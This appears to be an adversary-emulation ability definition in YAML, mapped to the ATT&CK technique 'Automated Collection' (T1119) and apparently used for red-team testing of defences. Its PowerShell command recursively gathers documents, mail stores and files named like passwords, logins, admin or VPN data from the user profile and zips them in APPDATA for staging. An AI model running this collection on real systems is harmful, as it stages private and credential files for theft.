---
- id: 5692da31-3586-4e4f-8f07-5750070c730b
  name: 2.A - Automated Collection (T1119)
  description: Execute PowerShell from cmd.exe to collect and compress files of specific extensions.
  tactic: collection
  technique:
    attack_id: T1119
    name: Automated Collection
  platforms:
    windows:
      psh,pwsh:
        command: |
          $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force
